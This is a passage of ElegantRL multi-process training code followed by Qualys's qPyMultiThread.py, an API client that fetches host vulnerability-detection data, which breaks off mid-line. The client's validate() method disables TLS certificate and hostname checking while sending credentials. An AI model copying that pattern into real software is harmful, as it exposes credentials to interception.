isinstance(self.target_return, int) or isinstance(self.target_return, float) '''agent''' assert hasattr(self.agent, 'init') assert hasattr(self.agent, 'update_net') assert hasattr(self.agent, 'explore_env') assert hasattr(self.agent, 'select_actions') '''auto set''' if self.cwd is None: agent_name = self.agent.__class__.__name__ env_name = getattr(self.env, 'env_name', self.env) self.cwd = f'./{agent_name}_{env_name}_{self.learner_gpus}' if self.eval_gpu_id is None: self.eval_gpu_id = self.learner_gpus[0] '''remove history''' if self.if_remove is None: self.if_remove = bool(input(f"| PRESS 'y' to REMOVE: {self.cwd}? ") == 'y') elif self.if_remove: import shutil shutil.rmtree(self.cwd, ignore_errors=True) print(f"| Remove cwd: {self.cwd}") else: print(f"| Keep cwd: {self.cwd}") os.makedirs(self.cwd, exist_ok=True) '''single processing training''' def train_and_evaluate(args, learner_id=0): args.init_before_training() # necessary! '''init: Agent''' agent = args.agent agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id], state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num, learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae) agent.save_or_load_agent(args.cwd, if_save=False) env = build_env(env=args.env, if_print=False, device_id=args.eval_gpu_id, env_num=args.env_num) if env.env_num == 1: agent.states = [env.reset(), ] assert isinstance(agent.states[0], np.ndarray) assert agent.states[0].shape == (env.state_dim,) else: agent.states = env.reset() assert isinstance(agent.states, torch.Tensor) assert agent.states.shape == (env.env_num, env.state_dim) '''init Evaluator''' eval_env = build_eval_env(args.eval_env, args.env, args.eval_gpu_id, args.env_num) evaluator = Evaluator(cwd=args.cwd, agent_id=0, eval_env=eval_env, eval_gap=args.eval_gap, eval_times1=args.eval_times1, eval_times2=args.eval_times2, target_return=args.target_return, if_overwrite=args.if_overwrite) evaluator.save_or_load_recoder(if_save=False) '''init ReplayBuffer''' if args.if_off_policy: buffer = ReplayBuffer(max_len=args.max_memo, state_dim=env.state_dim, action_dim=1 if env.if_discrete else env.action_dim, if_use_per=args.if_per_or_gae, gpu_id=args.learner_gpus[learner_id]) buffer.save_or_load_history(args.cwd, if_save=False) def update_buffer(_traj_list): ten_state, ten_other = _traj_list[0] buffer.extend_buffer(ten_state, ten_other) _steps, _r_exp = get_step_r_exp(ten_reward=ten_other[0]) # other = (reward, mask, action) return _steps, _r_exp else: buffer = list() def update_buffer(_traj_list): (ten_state, ten_reward, ten_mask, ten_action, ten_noise) = _traj_list[0] buffer[:] = (ten_state.squeeze(1), ten_reward, ten_mask, ten_action.squeeze(1), ten_noise.squeeze(1)) _step, _r_exp = get_step_r_exp(ten_reward=buffer[1]) return _step, _r_exp """start training""" cwd = args.cwd gamma = args.gamma break_step = args.break_step batch_size = args.batch_size target_step = args.target_step repeat_times = args.repeat_times reward_scale = args.reward_scale if_allow_break = args.if_allow_break soft_update_tau = args.soft_update_tau del args '''init ReplayBuffer after training start''' if agent.if_off_policy: if_load = buffer.save_or_load_history(cwd, if_save=False) if not if_load: traj_list = agent.explore_env(env, target_step, reward_scale, gamma) steps, r_exp = update_buffer(traj_list) evaluator.total_step += steps '''start training loop''' if_train = True while if_train: with torch.no_grad(): traj_list = agent.explore_env(env, target_step, reward_scale, gamma) steps, r_exp = update_buffer(traj_list) logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau) with torch.no_grad(): temp = evaluator.evaluate_and_save(agent.act, steps, r_exp, logging_tuple) if_reach_goal, if_save = temp if_train = not ((if_allow_break and if_reach_goal) or evaluator.total_step > break_step or os.path.exists(f'{cwd}/stop')) print(f'| UsedTime: {time.time() - evaluator.start_time:>7.0f} | SavedDir: {cwd}') agent.save_or_load_agent(cwd, if_save=True) buffer.save_or_load_history(cwd, if_save=True) if agent.if_off_policy else None evaluator.save_or_load_recoder(if_save=True) def get_step_r_exp(ten_reward): return len(ten_reward), ten_reward.mean().item() '''multiple processing training''' def train_and_evaluate_mp(args, agent_id=0): args.init_before_training() # necessary! process = list() mp.set_start_method(method='spawn', force=True) # force all the multiprocessing to 'spawn' methods '''learner''' learner_num = len(args.learner_gpus) learner_pipe = PipeLearner(learner_num) for learner_id in range(learner_num): '''evaluator''' if learner_id == learner_num - 1: evaluator_pipe = PipeEvaluator() process.append(mp.Process(target=evaluator_pipe.run, args=(args, agent_id))) else: evaluator_pipe = None '''explorer''' worker_pipe = PipeWorker(args.env_num, args.worker_num) for worker_id in range(args.worker_num): # if args.env_num == 1: # env_pipe = None # else: # env_pipe = PipeVectorEnv(args) # process.extend(env_pipe.process) env_pipe = None process.append(mp.Process(target=worker_pipe.run, args=(args, env_pipe, worker_id, learner_id))) process.append(mp.Process(target=learner_pipe.run, args=(args, evaluator_pipe, worker_pipe, learner_id))) [(p.start(), time.sleep(0.1)) for p in process] process[-1].join() process_safely_terminate(process) class PipeWorker: def __init__(self, env_num, worker_num): self.env_num = env_num self.worker_num = worker_num self.pipes = [mp.Pipe() for _ in range(worker_num)] self.pipe1s = [pipe[1] for pipe in self.pipes] def explore0(self, agent): act_dict = agent.act.state_dict() for worker_id in range(self.worker_num): self.pipe1s[worker_id].send(act_dict) traj_lists = [pipe1.recv() for pipe1 in self.pipe1s] return traj_lists def explore(self, agent): act_dict = agent.act.state_dict() if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801) # Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu for key, value in act_dict.items(): act_dict[key] = value.to(torch.device('cpu')) for worker_id in range(self.worker_num): self.pipe1s[worker_id].send(act_dict) traj_lists = [pipe1.recv() for pipe1 in self.pipe1s] return traj_lists def run(self, args, _comm_env, worker_id, learner_id): # not elegant: comm_env # print(f'| os.getpid()={os.getpid()} PipeExplore.run {learner_id}') env = build_env(env=args.env, if_print=False, device_id=args.workers_gpus[learner_id], env_num=args.env_num) '''init Agent''' agent = args.agent agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id], state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num, learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae) if args.env_num == 1: agent.states = [env.reset(), ] else: agent.states = env.reset() # VecEnv '''loop''' gamma = args.gamma target_step = args.target_step reward_scale = args.reward_scale del args with torch.no_grad(): while True: act_dict = self.pipes[worker_id][0].recv() if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801) # Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu for key, value in act_dict.items(): act_dict[key] = value.to(agent.device) agent.act.load_state_dict(act_dict) trajectory = agent.explore_env(env, target_step, reward_scale, gamma) if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801) # Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu trajectory = [[item.to(torch.device('cpu')) for item in item_list] for item_list in trajectory] self.pipes[worker_id][0].send(trajectory) class PipeLearner: def __init__(self, learner_num): self.learner_num = learner_num self.round_num = int(np.log2(learner_num)) self.pipes = [mp.Pipe() for _ in range(learner_num)] pipes = [mp.Pipe() for _ in range(learner_num)] self.pipe0s = [pipe[0] for pipe in pipes] self.pipe1s = [pipe[1] for pipe in pipes] self.device_list = [torch.device(f'cuda:{i}') for i in range(learner_num)] if learner_num == 1: self.idx_l = None elif learner_num == 2: self.idx_l = [(1,), (0,), ] elif learner_num == 4: self.idx_l = [(1, 2), (0, 3), (3, 0), (2, 1), ] elif learner_num == 8: self.idx_l = [(1, 2, 4), (0, 3, 5), (3, 0, 6), (2, 1, 7), (5, 6, 0), (4, 7, 1), (7, 4, 2), (6, 5, 3), ] else: print(f"| LearnerPipe, ERROR: learner_num {learner_num} should in (1, 2, 4, 8)") exit() def comm_data(self, data, learner_id, round_id): if round_id == -1: learner_jd = self.idx_l[learner_id][round_id] self.pipes[learner_jd][0].send(data) return self.pipes[learner_id][1].recv() else: learner_jd = self.idx_l[learner_id][round_id] self.pipe0s[learner_jd].send(data) return self.pipe1s[learner_id].recv() def comm_network_optim(self, agent, learner_id): device = self.device_list[learner_id] for round_id in range(self.round_num): data = get_comm_data(agent) data = self.comm_data(data, learner_id, round_id) if data: avg_update_net(agent.act, data[0], device) avg_update_optim(agent.act_optim, data[1], device) if data[1] else None avg_update_net(agent.cri, data[2], device) if data[2] else None avg_update_optim(agent.cri_optim, data[3], device) avg_update_net(agent.act_target, data[4], device) if agent.if_use_act_target else None avg_update_net(agent.cri_target, data[5], device) if agent.if_use_cri_target else None def run0(self, args, comm_eva, comm_exp, learner_id=0): # print(f'| os.getpid()={os.getpid()} PipeLearn.run, {learner_id}') pass '''init Agent''' agent = args.agent agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id], state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num, learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae) agent.save_or_load_agent(args.cwd, if_save=False) '''init ReplayBuffer''' if agent.if_off_policy: buffer_num = args.worker_num * args.env_num if self.learner_num > 1: buffer_num *= 2 buffer = ReplayBufferMP(max_len=args.max_memo, state_dim=args.state_dim, action_dim=1 if args.if_discrete else args.action_dim, if_use_per=args.if_per_or_gae, buffer_num=buffer_num, gpu_id=args.learner_gpus[learner_id]) buffer.save_or_load_history(args.cwd, if_save=False) def update_buffer(_traj_list): step_sum = 0 r_exp_sum = 0 for buffer_i, (ten_state, ten_other) in enumerate(_traj_list): buffer.buffers[buffer_i].extend_buffer(ten_state, ten_other) step_r_exp = get_step_r_exp(ten_reward=ten_other[:, 0]) # other = (reward, mask, action) step_sum += step_r_exp[0] r_exp_sum += step_r_exp[1] return step_sum, r_exp_sum / len(_traj_list) else: buffer = list() def update_buffer(_traj_list): _traj_list = list(map(list, zip(*_traj_list))) _traj_list = [torch.cat(t, dim=0) for t in _traj_list] (ten_state, ten_reward, ten_mask, ten_action, ten_noise) = _traj_list buffer[:] = (ten_state.squeeze(1), ten_reward, ten_mask, ten_action.squeeze(1), ten_noise.squeeze(1)) _step, _r_exp = get_step_r_exp(ten_reward=buffer[1]) return _step, _r_exp '''start training''' cwd = args.cwd batch_size = args.batch_size repeat_times = args.repeat_times soft_update_tau = args.soft_update_tau del args if_train = True while if_train: traj_lists = comm_exp.explore(agent) if self.learner_num > 1: data = self.comm_data(traj_lists, learner_id, round_id=-1) traj_lists.extend(data) traj_list = sum(traj_lists, list()) steps, r_exp = update_buffer(traj_list) del traj_lists logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau) if self.learner_num > 1: self.comm_network_optim(agent, learner_id) if comm_eva: if_train, if_save = comm_eva.evaluate_and_save_mp(agent.act, steps, r_exp, logging_tuple) agent.save_or_load_agent(cwd, if_save=True) if agent.if_off_policy: print(f"| LearnerPipe.run: ReplayBuffer saving in {cwd}") buffer.save_or_load_history(cwd, if_save=True) def run(self, args, comm_eva, comm_exp, learner_id=0): # print(f'| os.getpid()={os.getpid()} PipeLearn.run, {learner_id}') pass '''init Agent''' agent = args.agent agent.init(net_dim=args.net_dim, gpu_id=args.learner_gpus[learner_id], state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num, learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae) agent.save_or_load_agent(args.cwd, if_save=False) '''init ReplayBuffer''' if agent.if_off_policy: buffer_num = args.worker_num * args.env_num if self.learner_num > 1: buffer_num *= 2 buffer = ReplayBufferMP(max_len=args.max_memo, state_dim=args.state_dim, action_dim=1 if args.if_discrete else args.action_dim, if_use_per=args.if_per_or_gae, buffer_num=buffer_num, gpu_id=args.learner_gpus[learner_id]) buffer.save_or_load_history(args.cwd, if_save=False) def update_buffer(_traj_list): step_sum = 0 r_exp_sum = 0 for buffer_i, (ten_state, ten_other) in enumerate(_traj_list): buffer.buffers[buffer_i].extend_buffer(ten_state, ten_other) step_r_exp = get_step_r_exp(ten_reward=ten_other[:, 0]) # other = (reward, mask, action) step_sum += step_r_exp[0] r_exp_sum += step_r_exp[1] return step_sum, r_exp_sum / len(_traj_list) else: buffer = list() def update_buffer(_traj_list): _traj_list = list(map(list, zip(*_traj_list))) _traj_list = [torch.cat(t, dim=0) for t in _traj_list] (ten_state, ten_reward, ten_mask, ten_action, ten_noise) = _traj_list buffer[:] = (ten_state.squeeze(1), ten_reward, ten_mask, ten_action.squeeze(1), ten_noise.squeeze(1)) _step, _r_exp = get_step_r_exp(ten_reward=buffer[1]) return _step, _r_exp '''start training''' cwd = args.cwd batch_size = args.batch_size repeat_times = args.repeat_times soft_update_tau = args.soft_update_tau del args if_train = True while if_train: traj_lists = comm_exp.explore(agent) if self.learner_num > 1: data = self.comm_data(traj_lists, learner_id, round_id=-1) traj_lists.extend(data) traj_list = sum(traj_lists, list()) if sys.platform == 'win32': # todo: not elegant. YonV1943. Avoid CUDA runtime error (801) # Python3.9< multiprocessing can't send torch.tensor_gpu in WinOS. So I send torch.tensor_cpu traj_list = [[item.to(torch.device('cpu')) for item in item_list] for item_list in traj_list] steps, r_exp = update_buffer(traj_list) del traj_lists logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau) if self.learner_num > 1: self.comm_network_optim(agent, learner_id) if comm_eva: if_train, if_save = comm_eva.evaluate_and_save_mp(agent.act, steps, r_exp, logging_tuple) agent.save_or_load_agent(cwd, if_save=True) if agent.if_off_policy: print(f"| LearnerPipe.run: ReplayBuffer saving in {cwd}") buffer.save_or_load_history(cwd, if_save=True) class PipeEvaluator: # [ElegantRL.10.21] def __init__(self): super().__init__() self.pipe0, self.pipe1 = mp.Pipe() def evaluate_and_save_mp(self, agent_act, steps, r_exp, logging_tuple): if self.pipe1.poll(): # if_evaluator_idle if_train, if_save = self.pipe1.recv() act_cpu_dict = {k: v.cpu() for k, v in agent_act.state_dict().items()} else: if_train, if_save = True, False act_cpu_dict = None self.pipe1.send((act_cpu_dict, steps, r_exp, logging_tuple)) return if_train, if_save def run(self, args, _learner_id): # print(f'| os.getpid()={os.getpid()} PipeEvaluate.run {agent_id}') pass '''init: Agent''' agent = args.agent agent.init(net_dim=args.net_dim, gpu_id=args.eval_gpu_id, state_dim=args.state_dim, action_dim=args.action_dim, env_num=args.env_num, learning_rate=args.learning_rate, if_per_or_gae=args.if_per_or_gae) agent.save_or_load_agent(args.cwd, if_save=False) act = agent.act [setattr(param, 'requires_grad', False) for param in agent.act.parameters()] del agent '''init Evaluator''' eval_env = build_eval_env(args.eval_env, args.env, args.eval_gpu_id, args.env_num) evaluator = Evaluator(cwd=args.cwd, agent_id=0, eval_env=eval_env, eval_gap=args.eval_gap, eval_times1=args.eval_times1, eval_times2=args.eval_times2, target_return=args.target_return, if_overwrite=args.if_overwrite) evaluator.save_or_load_recoder(if_save=False) '''loop''' cwd = args.cwd break_step = args.break_step if_allow_break = args.if_allow_break del args if_save = False if_train = True if_reach_goal = False with torch.no_grad(): while if_train: act_dict, steps, r_exp, logging_tuple = self.pipe0.recv() if act_dict: act.load_state_dict(act_dict) if_reach_goal, if_save = evaluator.evaluate_and_save(act, steps, r_exp, logging_tuple) else: evaluator.total_step += steps if_train = not ((if_allow_break and if_reach_goal) or evaluator.total_step > break_step or os.path.exists(f'{cwd}/stop')) self.pipe0.send((if_train, if_save)) print(f'| UsedTime: {time.time() - evaluator.start_time:>7.0f} | SavedDir: {cwd}') evaluator.save_or_load_recoder(if_save=True) # class PipeVectorEnv: # def __init__(self, args): # self.env_num = args.env_num # self.pipes = [mp.Pipe() for _ in range(self.env_num)] # self.pipe0s = [pipe[0] for pipe in self.pipes] # # env = build_env(args.eval_env) # self.max_step = env.max_step # self.env_name = env.env_name # self.state_dim = env.state_dim # self.action_dim = env.action_dim # self.action_max = env.action_max # self.if_discrete = env.if_discrete # self.target_return = env.target_return # del env # # self.process = list() # for env_id in range(args.env_num): # self.process.append(mp.Process(target=self.run, args=(args, env_id))) # args.random_seed += 1 # set different for each env # # [p.start() for p in self.process] # # def reset(self): # vec_state = [pipe0.recv() for pipe0 in self.pipe0s] # return vec_state # # def step(self, vec_action): # pipe0_step # for i in range(self.env_num): # self.pipe0s[i].send(vec_action[i]) # return [pipe0.recv() for pipe0 in self.pipe0s] # list of (state, reward, done) # # def run(self, args, env_id): # np.random.seed(args.random_seed) # # env = build_env(args.eval_env, if_print=False) # pipe1 = self.pipes[env_id][1] # del args # # state = env.reset() # pipe1.send(state) # # while True: # action = pipe1.recv() # state, reward, done, _ = env.step(action) # pipe1.send((env.reset() if done else state, reward, done)) # # # def check(self): # # vec_state = self.reset() # # ten_state = np.array(vec_state) # # print(ten_state.shape) # # # # vec_action = np.array(((0.0, 1.0, 0.0), # # (0.0, 0.5, 0.0), # # (0.0, 0.1, 0.0),))[:self.env_num] # # assert self.env_num <= 3 # # # # trajectory_list = list() # # for _ in range(8): # # s_r_d_list = self.step(vec_action) # # ten_state = np.array([s_r_d[0] for s_r_d in s_r_d_list]) # # print(ten_state.shape) # # trajectory_list.append(s_r_d_list) # # # # trajectory_list = list(map(list, zip(*trajectory_list))) # 2D-list transpose # # print('| shape of trajectory_list:', len(trajectory_list), len(trajectory_list[0])) def get_comm_data(agent): act = list(agent.act.parameters()) cri_optim = get_optim_parameters(agent.cri_optim) if agent.cri is agent.act: cri = None act_optim = None else: cri = list(agent.cri.parameters()) act_optim = get_optim_parameters(agent.act_optim) act_target = list(agent.act_target.parameters()) if agent.if_use_act_target else None cri_target = list(agent.cri_target.parameters()) if agent.if_use_cri_target else None return act, act_optim, cri, cri_optim, act_target, cri_target # data """Utils""" def get_num_learner(visible_gpu): assert isinstance(visible_gpu, str) # visible_gpu may in {'0', '1', '1,', '1,2', '1,2,'} visible_gpu = eval(visible_gpu) num_learner = 1 if isinstance(visible_gpu, int) else len(visible_gpu) return num_learner def process_safely_terminate(process): for p in process: try: p.kill() except OSError as e: print(e) pass def get_optim_parameters(optim): # for avg_update_optim() params_list = list() for params_dict in optim.state_dict()['state'].values(): params_list.extend([t for t in params_dict.values() if isinstance(t, torch.Tensor)]) return params_list def avg_update_optim(dst_optim, src_optim_param, device): for dst, src in zip(get_optim_parameters(dst_optim), src_optim_param): dst.data.copy_((dst.data + src.data.to(device)) * 0.5) # dst.data.copy_(src.data * tau + dst.data * (1 - tau)) def avg_update_net(dst_net, src_net_param, device): for dst, src in zip(dst_net.parameters(), src_net_param): dst.data.copy_((dst.data + src.data.to(device)) * 0.5)
qPyMultiThread.py
# -*- coding=iso-8859-1 -*- # Copyright 2019 Qualys Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ ------------------------------------------------------------------- qPyMultiThread.py ------------------------------------------------------------------- This tool is an example of using the practices outlined in the Qualys v2 API User Guide under the Best Practices Section https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf Recommendations To improve performance, Multi-threading should be used. Here is an outline of what the POC multi-threading script does to obtain the maximum throughput: 1. Make an initial API call to the Host List API endpoint to retrieve all host IDs for the subscription that need to have data retrieved. Note: Its important to do any filtering on hosts at this point, as filtering during the detection pull can impact performance. Host List API Endpoint: https://<qualysapi url>/api/2.0/fo/asset/host/ 2. Break the total Host IDs into batches of 1,000-5,000 and send to a Queue. 3. Launch X worker threads that will pull the batches from the Queue and launch an API call against: https://<qualysapi url>/ api/2.0/fo/asset/host/vm/detection/ Using Parameters: params = dict( action='list', show_igs=0, show_reopened_info=1, active_kernels_only=1, output_format='XML', status='Active,Re-Opened,New', vm_processed_after=<Date in UTC>, # Formatted as: '2019-04-05T00:00:01Z' truncation_limit = 0, ids=ids ) Considerations Batch size On the backend, the host detection engine will break up the number of hosts to retrieve information on with a maximum size of 10,000. Using a batch size higher than this will not add any benefit to performance. In the same context, there are multiple places that need to pull information so there is an overhead cost regardless of the size being used. For that reason, using a batch size too small can start to hinder performance slightly due to the overhead being used on small requests. Different parameters and the amount of total data on the backend can make requests vary in duration, it is best to experiment with different batch size?s during peak and non-peak hours to determine the optimal size to use. Error Handling Robust error handling and logging is key to any automation and is recommended to implement mechanisms to catch exceptions and retry with exponential back off when errors are encountered. This includes all functions dealing with connection requests, parsing, or writing to disk. Taking care to log as much precise detail as possible so it will be easier to audit later should the need arise. Parsing If an error is encountered, the API will return an error code and a description of the error, which will look like this: Simple Return with error: <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE GENERIC_RETURN SYSTEM "https://qualysapi.qualys.com/api/2.0/simple_return.dtd?> <SIMPLE_RETURN> <RESPONSE> <DATETIME>2018-02-14T02:51:36Z</DATETIME> <CODE>1234</CODE> <TEXT>Description of Error</TEXT> </RESPONSE> </SIMPLE_RETURN> Generic Return with error: <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE GENERIC_RETURN SYSTEM "https://qualysapi.qualys.com/generic_return.dtd"> <GENERIC_RETURN> <API name="index.php" username="username at="2018-02-13T06:09:27Z"> <RETURN status="FAILED" number="999">Internal error. Please contact customer support.</RETURN> </GENERIC_RETURN> <!-- Incident signature: 123a12b12c1de4f12345678901a12a12 //--> A full list of Error code Responses can be found in the API User Guide in Appendix 1 https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf Connection Errors With retrieving large amounts of data sets and continuously streaming through the API for prolonged periods of time, comes the possibility of running into edge cases with regards to connections. Whichever method is used to make the outbound connection to the API endpoint, it is recommended to set a timeout to abort/retry a connection if it hasn?t been established in a reasonable amount of time. This is to prevent stalling out a thread, resulting in reduced performance. Also consider these types of connection errors, amongst others: - Empty Responses - Timeouts - Connection Reset or Internal Error responses. Status codes: 503, 500. - Connection Closed These can be caused by either side of the connection, so need to be caught, logged, and if they continue then investigated. """ # --------- # Library Imports # --------- import copy import ssl import sys import time from optparse import IndentedHelpFormatter, OptionGroup, OptionParser, textwrap from random import randint from threading import Thread, current_thread import ipaddress from ipaddress import NetmaskValueError, AddressValueError try: from hashlib import sha1 as _sha, md5 as _md5 except ImportError: # prior to Python 2.5, these were separate modules import sha import md5 _sha = sha.new _md5 = md5.new try: import xml.etree.cElementTree as ET except ImportError: import xml.etree.ElementTree as ET # Check Python version so we can import the appropriate libraries _ver = sys.version_info #: Python 2.x? is_py2 = (_ver[0] == 2) #: Python 3.x? is_py3 = (_ver[0] == 3) if is_py2: import Queue as queue from urllib2 import urlopen, ProxyHandler, build_opener, install_opener, Request, HTTPSHandler, HTTPHandler from urllib2 import HTTPError, URLError from httplib import HTTPSConnection, HTTPException str = unicode if is_py3: import queue from builtins import object from builtins import next from builtins import range from builtins import str from future.moves.urllib.request import urlopen, ProxyHandler, build_opener, install_opener from future.moves.urllib.request import Request, HTTPSHandler, HTTPHandler from future.moves.urllib.error import HTTPError, URLError from http.client import HTTPSConnection from http.client import HTTPException from builtins import input as raw_input str = str # --------- # Local Imports # --------- import lib from lib.APIResponse import APIResponse, APIResponseError, XMLFileBufferedResponse from lib.APIRequest import APIRequest from lib.configuration import Configuration from lib.loghandler import * from lib import utils logHandler = logHandler('qPyMultiThread') init = Configuration() init.setupFileStructure() NORETRYCODES = [400] class HTTPSConnectionWithKeepAlive(HTTPSConnection): """TCP KEEPALIVE In order to set tcp keepalive we need to subclass HTTPSHandler Here is the source code for HTTPSHandler from urllib2 github repo https://github.com/python/cpython/blob/2.7/Lib/urllib2.py class HTTPSHandler(AbstractHTTPHandler): def __init__(self, debuglevel=0, context=None): AbstractHTTPHandler.__init__(self, debuglevel) self._context = context def https_open(self, req): return self.do_open(httplib.HTTPSConnection, req, context=self._context) https_request = AbstractHTTPHandler.do_request_ As urllib2.HTTPSHandler uses httplib.HTTPSConnection we need to subclass this also. The connect method would create the socket. def connect(self): "Connect to a host on a given (SSL) port." HTTPConnection.connect(self) if self._tunnel_host: server_hostname = self._tunnel_host else: server_hostname = self.host self.sock = self._context.wrap_socket(self.sock, server_hostname=server_hostname) This is the method we would need to add the socket option for keep-alive. Now, one of the challenge with low level TCP settings is that TCP stack for each OS has a different settings. Usage of the new Handler: http_handler = HTTPSHandlerWithKeepAlive() opener = urllib2.build_opener(http_handler) urllib2.install_opener(opener) """ def connect(self): HTTPSConnection.connect(self) keepalive_idle_sec = 50 keepalive_interval_sec = 10 keep_alive_max_fail = 25 # Identify each OS and set the socket options # All possible values: # https://docs.python.org/2/library/sys.html#sys.platform if sys.platform.startswith('linux'): # LINUX is pretty straight forward # setsockopt supports all the values self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, keepalive_idle_sec) self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, keepalive_interval_sec) self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, keep_alive_max_fail) elif sys.platform.startswith('darwin'): # MAC OSX - is similar to linux but the only probelem is that # on OSX python socket module does not export TCP_KEEPIDLE,TCP_KEEPINTVL,TCP_KEEPCNT constant. # Taking the value for TCP_KEEPIDLE from darwin tcp.h # https://github.com/apple/darwin-xnu/blob/master/bsd/netinet/tcp.h # define TCP_KEEPALIVE 0x10 /* idle time used when SO_KEEPALIVE is enabled */ # define TCP_KEEPINTVL 0x101 /* interval between keepalives */ # define TCP_KEEPCNT 0x102 /* number of keepalives before close */ # TCP_KEEPINTVL and TCP_KEEPCNT were added 5 years ago. So, older OSX would not support it. self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) self.sock.setsockopt(socket.IPPROTO_TCP, 0x10, keepalive_idle_sec) self.sock.setsockopt(socket.IPPROTO_TCP, 0x101, keepalive_interval_sec) self.sock.setsockopt(socket.IPPROTO_TCP, 0x102, keep_alive_max_fail) elif sys.platform.startswith('win'): # WINDOWS - To set TCP Keepalive on windows need to use sock.ioctl and more info can be found here # https://msdn.microsoft.com/en-us/library/dd877220%28v=vs.85%29.aspx # The time is in milliseconds self.sock.ioctl(socket.SIO_KEEPALIVE_VALS, (1, keepalive_idle_sec * 1000, keepalive_interval_sec * 1000)) class Formatter(IndentedHelpFormatter): def format_description(self, description): if not description: return "" desc_width = 150 - self.current_indent indent = " " * self.current_indent # the above is still the same bits = description.split('\n') formatted_bits = [textwrap.fill(bit, desc_width, initial_indent = indent, subsequent_indent = indent) for bit in bits] result = "\n".join(formatted_bits) + "\n" return result def format_option_strings(self, option): """Return a comma-separated list of option strings & metavariables.""" self._short_opt_fmt = "%s" if option.takes_value(): metavar = option.metavar or option.dest.upper() short_opts = [self._short_opt_fmt % (sopt) for sopt in option._short_opts] long_opts = [self._long_opt_fmt % (lopt, metavar) for lopt in option._long_opts] else: short_opts = option._short_opts long_opts = option._long_opts if self.short_first: opts = short_opts + long_opts else: opts = long_opts + short_opts return ", ".join(opts) def format_epilog(self, epilog): return "\n" + epilog class HTTPSHandlerWithKeepAlive(HTTPSHandler): def https_open(self, req): return self.do_open(HTTPSConnectionWithKeepAlive, req) class CongifurationException(Exception): pass class APIClient(object): def __init__(self): self.timeout = 120 self.type = "GET" self.auth = None self.url = None self.responseHeaders = None self.config = None self.downloadAssets = False self.downloadDetections = False self.downloadHostAssets = False self.id_set = None self.logMessages = messages() self.log_host_detections = False self.log_host_details_in_detection = False self.collect_advanced_host_summary = False self.seed_file_enabled = False self.log_host_summary = False self.completedThreads = [] self.totalBytes = 0 self.total_hosts = 0 self.remaining = 0 self.completed = 0 self.host_logged = 0 self.receivedBytes = 0 self.vulns = 0 self.detectionParameters = dict( action = 'list', show_igs = 0, show_reopened_info = 1, # active_kernels_only=1, output_format = 'XML', status = 'Active,Re-Opened,New', # detection_processed_after=self.config.detectionDelta, truncation_limit = 0 ) def validate(self): """This method is to validate configured proxy and Qualys credentials work before launching. """ validateresponse = None logHandler.dynamicLogger("Validating Credentials to %s ..." % (self.config.baseURL + self.config.validateURL)) if self.config.useProxy: proxytest = ProxyHandler({'https': self.config.proxyHost}) proxyopener = build_opener(proxytest) try: install_opener(proxyopener) except Exception as e: logHandler.dynamicLogger("Failed to install proxy", logLevel = 'error') return str(e) request = APIRequest( type = 'GET', username = self.config.username, password = self.config.password) request.build_headers() validatereq = Request( self.config.baseURL + self.config.validateURL, data = None, headers = request.headers) try: # make request ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE https_handler = HTTPSHandler(debuglevel = 1) http_handler = HTTPHandler(debuglevel = 1) opener = build_opener(https_handler) opener2 = build_opener(http_handler) install_opener(opener) install_opener(opener2) validateresponse = urlopen(validatereq, timeout = self.timeout, context = ctx) APIResponse.responseHeaders = validateresponse.info() logHandler.dynamicLogger("Got response from Proxy, and msp/about.php endpoint...") return APIResponse except (URLError, HTTPError) as ue: logHandler.checkException(exception = ue, request = validatereq, retrycount = 0) # Failed validation of proxy or authentication return False except ssl.SSLError as e: context = 'SSLError' traceback = None if self.config.debug: import traceback logHandler.checkException( exception = e, request = validatereq, response = validateresponse, context = context, retrycount = 0) return False except IOError as e: # This will occur if something happens while iterating through the chunked response being written # to file. Usually it means either a problem writing to disk, or a # transient error occurred. import traceback logHandler.dynamicLogger( self.logMessages.message(IOERROR), duration = 0, url = validatereq.get_full_url() if validatereq is not None else None, traceback = traceback.format_exc(), exception = e, retrycount = 0) return False def closeConn(self, conn): """Cleanly close a urllib2.urlopen connection :param conn: urllib2.urlopen """ try: conn.close() except (AttributeError, NameError): # Connection didnt exist, safe to just pass pass def callDuration(self, startTime = None): """Given a start Time, return the delta between now and then :param startTime: time.time() :return: (int) seconds """ if startTime is None: return 0 endTime = time.time() return round(endTime 